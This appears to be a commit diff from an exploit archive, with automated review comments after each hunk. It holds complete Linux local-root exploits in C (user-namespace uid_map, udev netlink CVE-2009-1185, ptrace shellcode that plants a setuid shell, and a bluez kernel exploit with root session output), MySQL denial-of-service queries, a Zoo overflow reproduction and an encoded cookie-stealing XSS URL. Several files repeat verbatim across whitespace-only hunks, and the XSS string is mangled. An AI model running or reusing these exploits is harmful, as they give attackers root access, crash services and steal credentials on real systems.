http://www.example.com/map/traceRoute.do?name=192.168.1.2%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C% 6F%73%74%6D%6F%6E%2E62% 6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%2 0%21%21%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3 E%3C%2F%62%6F%64%79%3E
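Review bot: the percent-encoded payload in this deleted PoC contains stray spaces inside escape sequences ("%6C% 6F", "%2 0", "%3 E"), so the text was already mangled and would not reproduce as written; nothing usable is lost by removing it, but the surviving 30272.txt should be checked for the same corruption since it likely came from the same source.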


@ -1,9 +0,0 @@
source: http://www.securityfocus.com/bid/24004/info
Sun JDK is prone to a multiple vulnerabilities.
An attacker can exploit these issues to crash the affected application, effectively denying service. The attacker may also be able to execute arbitrary code, which may facilitate a compromise of the underlying system.
Sun JDK 1.5.0_07-b03 is vulnerable to these issues; other versions may also be affected.
http://www.exploit-db.com/sploits/30043.zip
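Review bot: this deleted file links to 30043.zip, so it is the text stub that accompanied 30044 and points at the archive attached to 30043; after the merge in files.csv that is consistent. The version line ("Sun JDK 1.5.0_07-b03 is vulnerable to these issues; other versions may also be affected") is the most precise version data either entry had, so it should survive in 30043.txt.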

platforms/linux/dos/33397.txt Executable file

@ -0,0 +1,17 @@
source: http://www.securityfocus.com/bid/37297/info
MySQL is prone to multiple remote denial-of-service vulnerabilities because it fails to handle certain SQL expressions.
An attacker can exploit these issues to crash the application, denying access to legitimate users.
Versions prior to MySQL 5.0.88 and 5.1.41 are vulnerable.
drop table if exists `t1`;
create table `t1`(`a` float);
insert into `t1` values (-2),(-1);
select 1 from `t1`
where
`a` <> '1' and not
row(`a`,`a`) <=>
row((select 1 from `t1` where 1=2),(select 1 from `t1`))
into @`var0`;
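Review bot: the file is added with the executable bit set ("Executable file"), which is unnecessary for a .txt advisory and inconsistent with the other .txt entries; add it with mode 100644. The body is fine as a PoC record, but it lacks the date and author the CSV carries (2009-11-23, Shane Bester), so the file is not self-describing once separated from files.csv.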

platforms/linux/dos/33398.txt Executable file

@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/37297/info
MySQL is prone to multiple remote denial-of-service vulnerabilities because it fails to handle certain SQL expressions.
An attacker can exploit these issues to crash the application, denying access to legitimate users.
Versions prior to MySQL 5.0.88 and 5.1.41 are vulnerable.
drop table if exists `t1`;
create table `t1`(`c0` bigint,`c3` multipolygon);
insert into `t1` values
(0,geomfromtext('multipolygon(((1 2,3 4,5 6,7 8,9 8),(7 6,5 4,3 2,1 2,3 4)))'));
select 1 from `t1` where
`c0` <> (select geometrycollectionfromwkb(`c3`) from `t1`);
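Review bot: the CSV description for 33398 names GeomFromWKB(), but the trigger in this file calls geometrycollectionfromwkb(); either the description should name the function actually used or the file should be checked against the advisory, since a defender grepping for the function in slow-query or audit logs will look for the wrong name. The same executable-bit remark as for 33397.txt applies here.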


@ -1,94 +0,0 @@
/* userns_root_sploit.c by */
/* Copyright (c) 2013 Andrew Lutomirski. All rights reserved. */
/* You may use, modify, and redistribute this code under the GPLv2. */
#define _GNU_SOURCE
#include <unistd.h>
#include <sched.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <err.h>
#include <linux/futex.h>
#include <errno.h>
#include <unistd.h>
#include <sys/syscall.h>
#ifndef CLONE_NEWUSER
#define CLONE_NEWUSER 0x10000000
#endif
pid_t parent;
int *ftx;
int childfn()
{
int fd;
char buf[128];
if (syscall(SYS_futex, ftx, FUTEX_WAIT, 0, 0, 0, 0) == -1 &&
errno != EWOULDBLOCK)
err(1, "futex");
sprintf(buf, "/proc/%ld/uid_map", (long)parent);
fd = open(buf, O_RDWR | O_CLOEXEC);
if (fd == -1)
err(1, "open %s", buf);
if (dup2(fd, 1) != 1)
err(1, "dup2");
// Write something like "0 0 1" to stdout with elevated capabilities.
execl("./zerozeroone", "./zerozeroone");
return 0;
}
int main(int argc, char **argv)
{
int dummy, status;
pid_t child;
if (argc < 2) {
printf("usage: userns_root_sploit COMMAND ARGS...\n\n"
"This will run a command as (global) uid 0 but no capabilities.\n");
return 1;
}
ftx = mmap(0, sizeof(int), PROT_READ | PROT_WRITE,
MAP_SHARED | MAP_ANONYMOUS, -1, 0);
if (ftx == MAP_FAILED)
err(1, "mmap");
parent = getpid();
if (signal(SIGCHLD, SIG_DFL) != 0)
err(1, "signal");
child = fork();
if (child == -1)
err(1, "fork");
if (child == 0)
return childfn();
*ftx = 1;
if (syscall(SYS_futex, ftx, FUTEX_WAKE, 1, 0, 0, 0) != 0)
err(1, "futex");
if (unshare(CLONE_NEWUSER) != 0)
err(1, "unshare(CLONE_NEWUSER)");
if (wait(&status) != child)
err(1, "wait");
if (!WIFEXITED(status) || WEXITSTATUS(status) != 0)
errx(1, "child failed");
if (setresuid(0, 0, 0) != 0)
err(1, "setresuid");
execvp(argv[1], argv+1);
err(1, argv[1]);
return 0;
}
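Review bot: this deleted 94-line source is Andrew Lutomirski's userns_root_sploit.c, i.e. the file behind 25307, which the files.csv hunk above drops in favour of 25450 (same author, same file_ns_capable() bug, six days later). Deleting the file with its entry is right, but the commit message should link the two ids. Note also that this version depends on an external helper "./zerozeroone" that is not part of the file; if 25450.c has the same dependency, its header should say so, because the archived file is otherwise incomplete.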


@ -1,13 +0,0 @@
source: http://www.securityfocus.com/bid/17126/info
Zoo is prone to a local buffer-overflow vulnerability. This issue is due to a failure in the application to do proper bounds checking on user-supplied data before using it in a finite-sized buffer.
An attacker can exploit this issue to execute arbitrary code in the context of the victim user running the affected application to potentially gain elevated privileges.
mkdir `perl -e 'print "A"x254'`
cd `perl -e 'print "A"x254'`
mkdir `perl -e 'print "A"x254'`
cd `perl -e 'print "A"x254'`
touch feh
cd ../..
zoo a arch.zoo `perl -e 'print "A"x254 . "/" . "A"x254 . "/feh"'`
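Review bot: this is the Zoo 2.10 advisory text that went with 27426, removed alongside the CSV line above; 27425.txt is the surviving copy and must contain the same reproduction lines, otherwise the dedup loses the PoC. The classification point stands: the text here speaks of elevated privileges, so the retained entry arguably belongs in "local" rather than "dos".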


@ -1,110 +1,110 @@
/*
* cve-2009-1185.c
*
* udev < 141 Local Privilege Escalation Exploit
* Jon Oberheide <jon@oberheide.org>
* http://jon.oberheide.org
*
* Information:
*
* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1185
*
* udev before 1.4.1 does not verify whether a NETLINK message originates
* from kernel space, which allows local users to gain privileges by sending
* a NETLINK message from user space.
*
* Notes:
*
* An alternate version of kcope's exploit. This exploit leverages the
* 95-udev-late.rules functionality that is meant to run arbitrary commands
* when a device is removed. A bit cleaner and reliable as long as your
* distro ships that rule file.
*
* Tested on Gentoo, Intrepid, and Jaunty.
*
* Usage:
*
* Pass the PID of the udevd netlink socket (listed in /proc/net/netlink,
* usually is the udevd PID minus 1) as argv[1].
*
* The exploit will execute /tmp/run as root so throw whatever payload you
* want in there.
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <linux/types.h>
#include <linux/netlink.h>
#ifndef NETLINK_KOBJECT_UEVENT
#define NETLINK_KOBJECT_UEVENT 15
#endif
int
main(int argc, char **argv)
{
int sock;
char *mp, *err;
char message[4096];
struct stat st;
struct msghdr msg;
struct iovec iovector;
struct sockaddr_nl address;
if (argc < 2) {
err = "Pass the udevd netlink PID as an argument";
printf("[-] Error: %s\n", err);
exit(1);
}
if ((stat("/etc/udev/rules.d/95-udev-late.rules", &st) == -1) &&
(stat("/lib/udev/rules.d/95-udev-late.rules", &st) == -1)) {
err = "Required 95-udev-late.rules not found";
printf("[-] Error: %s\n", err);
exit(1);
}
if (stat("/tmp/run", &st) == -1) {
err = "/tmp/run does not exist, please create it";
printf("[-] Error: %s\n", err);
exit(1);
}
system("chmod +x /tmp/run");
memset(&address, 0, sizeof(address));
address.nl_family = AF_NETLINK;
address.nl_pid = atoi(argv[1]);
address.nl_groups = 0;
msg.msg_name = (void*)&address;
msg.msg_namelen = sizeof(address);
msg.msg_iov = &iovector;
msg.msg_iovlen = 1;
sock = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
bind(sock, (struct sockaddr *) &address, sizeof(address));
mp = message;
mp += sprintf(mp, "remove@/d") + 1;
mp += sprintf(mp, "SUBSYSTEM=block") + 1;
mp += sprintf(mp, "DEVPATH=/dev/foo") + 1;
mp += sprintf(mp, "TIMEOUT=10") + 1;
mp += sprintf(mp, "ACTION=remove") +1;
mp += sprintf(mp, "REMOVE_CMD=/tmp/run") +1;
iovector.iov_base = (void*)message;
iovector.iov_len = (int)(mp-message);
sendmsg(sock, &msg, 0);
close(sock);
return 0;
}
// milw0rm.com [2009-04-30]
/*
* cve-2009-1185.c
*
* udev < 141 Local Privilege Escalation Exploit
* Jon Oberheide <jon@oberheide.org>
* http://jon.oberheide.org
*
* Information:
*
* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1185
*
* udev before 1.4.1 does not verify whether a NETLINK message originates
* from kernel space, which allows local users to gain privileges by sending
* a NETLINK message from user space.
*
* Notes:
*
* An alternate version of kcope's exploit. This exploit leverages the
* 95-udev-late.rules functionality that is meant to run arbitrary commands
* when a device is removed. A bit cleaner and reliable as long as your
* distro ships that rule file.
*
* Tested on Gentoo, Intrepid, and Jaunty.
*
* Usage:
*
* Pass the PID of the udevd netlink socket (listed in /proc/net/netlink,
* usually is the udevd PID minus 1) as argv[1].
*
* The exploit will execute /tmp/run as root so throw whatever payload you
* want in there.
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <linux/types.h>
#include <linux/netlink.h>
#ifndef NETLINK_KOBJECT_UEVENT
#define NETLINK_KOBJECT_UEVENT 15
#endif
int
main(int argc, char **argv)
{
int sock;
char *mp, *err;
char message[4096];
struct stat st;
struct msghdr msg;
struct iovec iovector;
struct sockaddr_nl address;
if (argc < 2) {
err = "Pass the udevd netlink PID as an argument";
printf("[-] Error: %s\n", err);
exit(1);
}
if ((stat("/etc/udev/rules.d/95-udev-late.rules", &st) == -1) &&
(stat("/lib/udev/rules.d/95-udev-late.rules", &st) == -1)) {
err = "Required 95-udev-late.rules not found";
printf("[-] Error: %s\n", err);
exit(1);
}
if (stat("/tmp/run", &st) == -1) {
err = "/tmp/run does not exist, please create it";
printf("[-] Error: %s\n", err);
exit(1);
}
system("chmod +x /tmp/run");
memset(&address, 0, sizeof(address));
address.nl_family = AF_NETLINK;
address.nl_pid = atoi(argv[1]);
address.nl_groups = 0;
msg.msg_name = (void*)&address;
msg.msg_namelen = sizeof(address);
msg.msg_iov = &iovector;
msg.msg_iovlen = 1;
sock = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
bind(sock, (struct sockaddr *) &address, sizeof(address));
mp = message;
mp += sprintf(mp, "remove@/d") + 1;
mp += sprintf(mp, "SUBSYSTEM=block") + 1;
mp += sprintf(mp, "DEVPATH=/dev/foo") + 1;
mp += sprintf(mp, "TIMEOUT=10") + 1;
mp += sprintf(mp, "ACTION=remove") +1;
mp += sprintf(mp, "REMOVE_CMD=/tmp/run") +1;
iovector.iov_base = (void*)message;
iovector.iov_len = (int)(mp-message);
sendmsg(sock, &msg, 0);
close(sock);
return 0;
}
// milw0rm.com [2009-04-30]
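Review bot: old and new versions of this 110-line file are identical as rendered, so the only change is line endings or the mode bit; mixing such normalisation into a content commit makes the real edits hard to review. Split it out or set the text attributes in .gitattributes. While here, the header comment says "udev before 1.4.1" where the title (and CVE-2009-1185) refer to udev before release 141; fix the comment so anyone checking whether their udev is affected does not compare against the wrong version string.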


@ -1,91 +1,91 @@
/*
ptrace_attach privilege escalation exploit by s0m3b0dy
[*] tested on Gentoo 2.6.29rc1
grataz:
Tazo, rassta, nukedclx, maciek, D0hannuk, mivus, wacky, nejmo, filo...
email: s0m3b0dy1 (at) gmail.com
*/
#include <grp.h>
#include <stdio.h>
#include <fcntl.h>
#include <errno.h>
#include <paths.h>
#include <string.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <sys/param.h>
#include <sys/types.h>
#include <sys/ptrace.h>
#include <sys/socket.h>
char shellcode[] =
"\x6a\x46\x58\x31\xdb\x31\xc9\xcd\x80\xeb\x21\x5f\x6a\x0b\x58\x99"
"\x52\x66\x68\x2d\x63\x89\xe6\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62"
"\x69\x6e\x89\xe3\x52\x57\x56\x53\x89\xe1\xcd\x80\xe8\xda\xff\xff\xff"
"echo \"#include <stdio.h>\nmain(){setuid(0);if(getuid()==0) printf(\\\"r00teed!\\n\\\");execv(\\\"/bin/bash\\\",0);return 0;}\" > /tmp/.exp.c;gcc /tmp/.exp.c -o /tmp/.exp;rm /tmp/.exp.c;chmod +s /tmp/.exp;exit;";
struct user_regs_struct322 {
unsigned long ebx, ecx, edx, esi, edi, ebp, eax;
unsigned short ds, __ds, es, __es;
unsigned short fs, __fs, gs, __gs;
unsigned long orig_eax, eip;
unsigned short cs, __cs;
unsigned long eflags, esp;
unsigned short ss, __ss;
};
main()
{
struct user_regs_struct322 regs;
struct stat buf;
int i,o;
unsigned long * src;
unsigned long * dst;
char *env[2];
env[0]="/usr/bin/gpasswd"; // some suid file
env[1]=0;
if((o=fork()) == 0)
{
execve(env[0],env,0);
exit(0);
}
if(ptrace(PTRACE_ATTACH,o,0,0)==-1)
{
printf("\n[-] Attach\n");
exit(0);
}
wait((int *)0);
if (ptrace(PTRACE_GETREGS, o, NULL, &regs) == -1){
printf("\n[-] read registers\n");
exit(0);
}
printf( "[+] EIP - 0x%08lx\n", regs.eip);
dst= (unsigned long *) regs.eip;
src = (unsigned long *) shellcode;
for(i=0;i<sizeof(shellcode) -1;i+=4)
if (ptrace(PTRACE_POKETEXT, o, dst++, *src++) == -1){
printf("\n[-] write shellcode\n");
exit(0);
}
ptrace(PTRACE_CONT, o, 0, 0);
ptrace(PTRACE_DETACH,o,0,0);
printf("[+] Waiting for root...\n");
sleep(2);
if(!stat("/tmp/.exp",&buf))
{
printf("[+] Executing suid shell /tmp/.exp...\n");
execv("/tmp/.exp",0);
}
else
{
printf("[-] Damn no r00t here :(\n");
}
return 0;
}
// milw0rm.com [2009-05-13]
/*
ptrace_attach privilege escalation exploit by s0m3b0dy
[*] tested on Gentoo 2.6.29rc1
grataz:
Tazo, rassta, nukedclx, maciek, D0hannuk, mivus, wacky, nejmo, filo...
email: s0m3b0dy1 (at) gmail.com
*/
#include <grp.h>
#include <stdio.h>
#include <fcntl.h>
#include <errno.h>
#include <paths.h>
#include <string.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <sys/param.h>
#include <sys/types.h>
#include <sys/ptrace.h>
#include <sys/socket.h>
char shellcode[] =
"\x6a\x46\x58\x31\xdb\x31\xc9\xcd\x80\xeb\x21\x5f\x6a\x0b\x58\x99"
"\x52\x66\x68\x2d\x63\x89\xe6\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62"
"\x69\x6e\x89\xe3\x52\x57\x56\x53\x89\xe1\xcd\x80\xe8\xda\xff\xff\xff"
"echo \"#include <stdio.h>\nmain(){setuid(0);if(getuid()==0) printf(\\\"r00teed!\\n\\\");execv(\\\"/bin/bash\\\",0);return 0;}\" > /tmp/.exp.c;gcc /tmp/.exp.c -o /tmp/.exp;rm /tmp/.exp.c;chmod +s /tmp/.exp;exit;";
struct user_regs_struct322 {
unsigned long ebx, ecx, edx, esi, edi, ebp, eax;
unsigned short ds, __ds, es, __es;
unsigned short fs, __fs, gs, __gs;
unsigned long orig_eax, eip;
unsigned short cs, __cs;
unsigned long eflags, esp;
unsigned short ss, __ss;
};
main()
{
struct user_regs_struct322 regs;
struct stat buf;
int i,o;
unsigned long * src;
unsigned long * dst;
char *env[2];
env[0]="/usr/bin/gpasswd"; // some suid file
env[1]=0;
if((o=fork()) == 0)
{
execve(env[0],env,0);
exit(0);
}
if(ptrace(PTRACE_ATTACH,o,0,0)==-1)
{
printf("\n[-] Attach\n");
exit(0);
}
wait((int *)0);
if (ptrace(PTRACE_GETREGS, o, NULL, &regs) == -1){
printf("\n[-] read registers\n");
exit(0);
}
printf( "[+] EIP - 0x%08lx\n", regs.eip);
dst= (unsigned long *) regs.eip;
src = (unsigned long *) shellcode;
for(i=0;i<sizeof(shellcode) -1;i+=4)
if (ptrace(PTRACE_POKETEXT, o, dst++, *src++) == -1){
printf("\n[-] write shellcode\n");
exit(0);
}
ptrace(PTRACE_CONT, o, 0, 0);
ptrace(PTRACE_DETACH,o,0,0);
printf("[+] Waiting for root...\n");
sleep(2);
if(!stat("/tmp/.exp",&buf))
{
printf("[+] Executing suid shell /tmp/.exp...\n");
execv("/tmp/.exp",0);
}
else
{
printf("[-] Damn no r00t here :(\n");
}
return 0;
}
// milw0rm.com [2009-05-13]
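Review bot: both sides of this hunk are line-for-line identical in the visible region (the tail from `for(i=0;i<sizeof(shellcode) -1;i+=4)` through `// milw0rm.com [2009-05-13]` repeats verbatim), so the change looks like whitespace or line-ending normalization rather than a content update; commit it as such, or confirm with whitespace-insensitive diffing, so the file's history records what actually changed.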

@ -1,258 +1,258 @@
/*
Due to many responses i've improved the exploit
to cover more systems!
ONG_BAK v0.9 [october 24th 05]
""""""""""""""""""""""""""""""""""""
o universal "shellcode" added
o try to use all possible memory regions
o bugfixes
qobaiashi@voyager:~/w00nf/kernelsploit> ./ong_bak -100222
-|-bluez local root exploit v.0.9 -by qobaiashi-
|
|- i've found kernel 2.6.11.4-20a-default
|- trampoline is at 0x804869c
|- trying...
|- [ecx: bf8d0000 ]
|- suitable value found!using 0xbf8d0000
|- the time has come to push the button...
sh-3.00# exit
ONG_BAK v0.3 [april 8th 05]
"""""""""""""""""""""""""""""""""
ong_bak now checks the value of ecx and launches
the exploit in case a suitable value has been found!
ONG_BAK v0.1 [april 4th 05]
"""""""""""""""""""""""""""""""""
local root exploit for the bluetooth bug
usage:
the bug is quite stable so you can't realy fuck things up
if you stick to the following:
play around with the negative argument until ecx points to
our data segment:
qobaiashi@voyager:~> ./ong_bak -1002341
-|-local bluez exploit v.0.3 -by qobaiashi-
|
|- i've found kernel 2.6.4-52-default
|- trying...
|- [ecx: 0b8f0f0f ]
qobaiashi@voyager:~> ./ong_bak -10023411
-|-local bluez exploit v.0.3 -by qobaiashi-
|
|- i've found kernel 2.6.4-52-default
|- trying...
|- [ecx: 0809da40 ]
|- suitable value found!using 0x0809da40
|- the time has come to push the button..
qobaiashi@voyager:~> id
uid=0(root) gid=0(root) Gruppen=14(uucp),16(dialout),17(audio),33(video),100(users)
qobaiashi@voyager:~>
that's it.
unfortunately it's not yet very practicable..
qobaiashi@u-n-f.com
*/
#include <sys/klog.h>
#include <sys/types.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <bluetooth/bluetooth.h>
#include <bluetooth/hci.h>
#include <bluetooth/hci_lib.h>
#include <sys/utsname.h>
#include <sys/mman.h>
void usage(char *path);
//===================[ kernel 2.6* privilege elevator ]===============================
//===================[ qobaiashi@u-n-f.com ]===============================
//globals
int uid, gid;
extern load_highlevel;
__asm__
(
"load_highlevel: \n"
"xor %eax, %eax \n"
"mov $0xffffe000, %eax\n"
"and %esp,%eax \n"
"pushl %eax \n"
"call set_root \n"
"pop %eax \n"
//ret to userspace-2.6.* version
" cli \n"
" pushl $0x7b \n" //DS user selector
" pop %ds \n"
" pushl %ds \n" //SS
" pushl $0xc0000000 \n" //ESP
" pushl $0x246 \n" //EFLAGS
" pushl $0x73 \n" //CS user selector
" pushl $shellcode \n" //EIP must not be a push /bin/sh shellcode!!
"iret \n"
);
void set_root(unsigned int *ts)
{
ts = (int*)*ts;
int cntr;
//hope you guys are int aligned
for(cntr = 0; cntr <= 512; cntr++, ts++)
if( ts[0] == uid && ts[1] == uid && ts[4] == gid && ts[5] == gid)
ts[0] = ts[1] = ts[4] = ts[5] = 0;
}
void shellcode()
{
system("/bin/sh");
exit(0);
}
//====================================================================================
//====================================================================================
main(int argc, char *argv[])
{
char buf[2048];
int sock, *mod = (int*)buf;
int *linker = 0;
unsigned int arg;
int tmp;
char *check;
struct utsname vers;
gid = getgid();
uid = getuid();
printf("-|-bluez local root exploit v.0.9 -by qobaiashi-\n |\n");
if (uname(&vers) < 0)
printf(" |- couldn't determine kernel version\n");
else
printf(" |- i've found kernel %s\n", vers.release);
printf(" |- trampoline is at %p\n", &load_highlevel);
if (argc < 2)
{
usage(argv[0]);
exit(1);
}
if (argc == 2)
arg = strtoul(argv[1], 0, 0);
if (fork() != 0)//parent watch the Oops
{
//previous Oops printing
usleep(1000);
if ((tmp = klogctl(0x3, buf, 1700)) > -1)
{
check = strstr(buf, "ecx: ");
printf(" |- [%0.14s]\n", check);
check+=5;
*(check+9) = 0x00;*(--check) = 'x';*(--check) = '0';
mod = (unsigned int*)strtoul(check, 0, 0);
//page align FIXME: might be booggy
int *ecx = mod;
mod = (int)mod &~ 0x00000fff;
linker =
mmap((void*)mod,0x2000,PROT_WRITE|PROT_READ,MAP_SHARED|MAP_ANONYMOUS|MAP_FIXED,0,0);
if(linker == mod)//we could mmap the area
{
printf(" |- suitable value found!using %p\n", mod);
printf(" |- the time has come to push the button... \n");
for (sock = 0;sock <= 1;sock++) //use ecx
*(ecx++) = (int)&load_highlevel; //link to shellcode
}
else
{
printf(" |- could not mmap %p\n", mod);
if( brk((void*)mod+0x200 ) == -1)
{
printf(" |- could not brk to %p\n", mod);
printf(" `-------------------------------\n");
exit(-1);
}
//here we did it
printf(" |- suitable value found!using %p\n", mod);
printf(" |- the time has come to push the button... \n");
for (sock = 0;sock <= 1;sock++) //use ecx
*(ecx++) = (int)&load_highlevel; //link to shellcode
}
if ((sock = socket(AF_BLUETOOTH, SOCK_RAW, arg)) < 0)
exit(1);
}
return 0;
}
if (fork() == 0)//child does the pre-exploit
{
printf(" |- trying...\n");
if ((sock = socket(AF_BLUETOOTH, SOCK_RAW, arg)) < 0)
{
printf(" |- something went w0rng (invalid value)\n");
exit(1);
}
}
exit(0);
}
/*****************\
|** usage **|
\*****************/
void usage(char *path)
{
printf(" |----------------------------\n");
printf(" | usage: %s <negative value> \n", path);
printf(" | tested:\n");
printf(" | SuSE 9.1: -10023411 \n");
printf(" | -41122122 \n");
printf(" | Kernel 2.6.11: -10023 \n");
printf(" | SuSE 9.3: -100222\n");
printf(" | -102901\n");
printf(" `-----------------------\n");
exit(0);
}
// 1st post: milw0rm.com [2005-04-09]
// milw0rm.com [2005-10-26]
/*
Due to many responses i've improved the exploit
to cover more systems!
ONG_BAK v0.9 [october 24th 05]
""""""""""""""""""""""""""""""""""""
o universal "shellcode" added
o try to use all possible memory regions
o bugfixes
qobaiashi@voyager:~/w00nf/kernelsploit> ./ong_bak -100222
-|-bluez local root exploit v.0.9 -by qobaiashi-
|
|- i've found kernel 2.6.11.4-20a-default
|- trampoline is at 0x804869c
|- trying...
|- [ecx: bf8d0000 ]
|- suitable value found!using 0xbf8d0000
|- the time has come to push the button...
sh-3.00# exit
ONG_BAK v0.3 [april 8th 05]
"""""""""""""""""""""""""""""""""
ong_bak now checks the value of ecx and launches
the exploit in case a suitable value has been found!
ONG_BAK v0.1 [april 4th 05]
"""""""""""""""""""""""""""""""""
local root exploit for the bluetooth bug
usage:
the bug is quite stable so you can't realy fuck things up
if you stick to the following:
play around with the negative argument until ecx points to
our data segment:
qobaiashi@voyager:~> ./ong_bak -1002341
-|-local bluez exploit v.0.3 -by qobaiashi-
|
|- i've found kernel 2.6.4-52-default
|- trying...
|- [ecx: 0b8f0f0f ]
qobaiashi@voyager:~> ./ong_bak -10023411
-|-local bluez exploit v.0.3 -by qobaiashi-
|
|- i've found kernel 2.6.4-52-default
|- trying...
|- [ecx: 0809da40 ]
|- suitable value found!using 0x0809da40
|- the time has come to push the button..
qobaiashi@voyager:~> id
uid=0(root) gid=0(root) Gruppen=14(uucp),16(dialout),17(audio),33(video),100(users)
qobaiashi@voyager:~>
that's it.
unfortunately it's not yet very practicable..
qobaiashi@u-n-f.com
*/
#include <sys/klog.h>
#include <sys/types.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <bluetooth/bluetooth.h>
#include <bluetooth/hci.h>
#include <bluetooth/hci_lib.h>
#include <sys/utsname.h>
#include <sys/mman.h>
void usage(char *path);
//===================[ kernel 2.6* privilege elevator ]===============================
//===================[ qobaiashi@u-n-f.com ]===============================
//globals
int uid, gid;
extern load_highlevel;
__asm__
(
"load_highlevel: \n"
"xor %eax, %eax \n"
"mov $0xffffe000, %eax\n"
"and %esp,%eax \n"
"pushl %eax \n"
"call set_root \n"
"pop %eax \n"
//ret to userspace-2.6.* version
" cli \n"
" pushl $0x7b \n" //DS user selector
" pop %ds \n"
" pushl %ds \n" //SS
" pushl $0xc0000000 \n" //ESP
" pushl $0x246 \n" //EFLAGS
" pushl $0x73 \n" //CS user selector
" pushl $shellcode \n" //EIP must not be a push /bin/sh shellcode!!
"iret \n"
);
void set_root(unsigned int *ts)
{
ts = (int*)*ts;
int cntr;
//hope you guys are int aligned
for(cntr = 0; cntr <= 512; cntr++, ts++)
if( ts[0] == uid && ts[1] == uid && ts[4] == gid && ts[5] == gid)
ts[0] = ts[1] = ts[4] = ts[5] = 0;
}
void shellcode()
{
system("/bin/sh");
exit(0);
}
//====================================================================================
//====================================================================================
main(int argc, char *argv[])
{
char buf[2048];
int sock, *mod = (int*)buf;
int *linker = 0;
unsigned int arg;
int tmp;
char *check;
struct utsname vers;
gid = getgid();
uid = getuid();
printf("-|-bluez local root exploit v.0.9 -by qobaiashi-\n |\n");
if (uname(&vers) < 0)
printf(" |- couldn't determine kernel version\n");
else
printf(" |- i've found kernel %s\n", vers.release);
printf(" |- trampoline is at %p\n", &load_highlevel);
if (argc < 2)
{
usage(argv[0]);
exit(1);
}
if (argc == 2)
arg = strtoul(argv[1], 0, 0);
if (fork() != 0)//parent watch the Oops
{
//previous Oops printing
usleep(1000);
if ((tmp = klogctl(0x3, buf, 1700)) > -1)
{
check = strstr(buf, "ecx: ");
printf(" |- [%0.14s]\n", check);
check+=5;
*(check+9) = 0x00;*(--check) = 'x';*(--check) = '0';
mod = (unsigned int*)strtoul(check, 0, 0);
//page align FIXME: might be booggy
int *ecx = mod;
mod = (int)mod &~ 0x00000fff;
linker =
mmap((void*)mod,0x2000,PROT_WRITE|PROT_READ,MAP_SHARED|MAP_ANONYMOUS|MAP_FIXED,0,0);
if(linker == mod)//we could mmap the area
{
printf(" |- suitable value found!using %p\n", mod);
printf(" |- the time has come to push the button... \n");
for (sock = 0;sock <= 1;sock++) //use ecx
*(ecx++) = (int)&load_highlevel; //link to shellcode
}
else
{
printf(" |- could not mmap %p\n", mod);
if( brk((void*)mod+0x200 ) == -1)
{
printf(" |- could not brk to %p\n", mod);
printf(" `-------------------------------\n");
exit(-1);
}
//here we did it
printf(" |- suitable value found!using %p\n", mod);
printf(" |- the time has come to push the button... \n");
for (sock = 0;sock <= 1;sock++) //use ecx
*(ecx++) = (int)&load_highlevel; //link to shellcode
}
if ((sock = socket(AF_BLUETOOTH, SOCK_RAW, arg)) < 0)
exit(1);
}
return 0;
}
if (fork() == 0)//child does the pre-exploit
{
printf(" |- trying...\n");
if ((sock = socket(AF_BLUETOOTH, SOCK_RAW, arg)) < 0)
{
printf(" |- something went w0rng (invalid value)\n");
exit(1);
}
}
exit(0);
}
/*****************\
|** usage **|
\*****************/
void usage(char *path)
{
printf(" |----------------------------\n");
printf(" | usage: %s <negative value> \n", path);
printf(" | tested:\n");
printf(" | SuSE 9.1: -10023411 \n");
printf(" | -41122122 \n");
printf(" | Kernel 2.6.11: -10023 \n");
printf(" | SuSE 9.3: -100222\n");
printf(" | -102901\n");
printf(" `-----------------------\n");
exit(0);
}
// 1st post: milw0rm.com [2005-04-09]
// milw0rm.com [2005-10-26]
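Review bot: the header `@ -1,258 +1,258 @@` rewrites the whole file with the same line count, and the removed and added copies of ong_bak (from `/*` through `// milw0rm.com [2005-10-26]`) are identical as shown, so this is a whitespace or line-ending change, not the content update the commit suggests; either note that in the commit message or review it with whitespace ignored so the real revision history of this file is not obscured.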

@ -6,4 +6,7 @@ An attacker can exploit these issues to crash the affected application, effectiv
Sun JDK 1.5.0_07-b03 is vulnerable to these issues; other versions may also be affected.
http://www.exploit-db.com/sploits/30043.zip
http://www.exploit-db.com/sploits/30043.zip
CVE: 2007-2788 & 2007-2789
OSVDB-ID: 36199 & 36200
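Review bot: the download link `http://www.exploit-db.com/sploits/30043.zip` is added twice in this hunk; keep one copy. The identifier lines would also read better in canonical form (`CVE-2007-2788`, `CVE-2007-2789`) so they can be matched by tooling.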

@ -0,0 +1,46 @@
source: http://www.securityfocus.com/bid/37305/info
Oracle E-Business Suite is prone to multiple authentication-bypass and HTML-injection vulnerabilities.
Attackers could exploit these issues to steal cookie-based authentication credentials, perform unauthorized actions, or bypass certain security restrictions. Other attacks are also possible.
